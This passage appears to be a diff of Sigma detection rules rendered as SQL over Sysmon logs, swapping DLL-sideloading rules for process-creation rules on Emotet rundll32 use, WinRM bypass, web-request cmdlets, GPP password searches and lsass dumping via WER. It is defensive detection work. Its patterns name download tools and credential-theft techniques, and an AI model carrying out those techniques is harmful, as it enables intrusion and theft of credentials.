lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", - "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + 
"description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "status": "test", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.t1574.001" + 
"attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - 
"attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE 
'%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the 
load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the 
Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' 
AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE 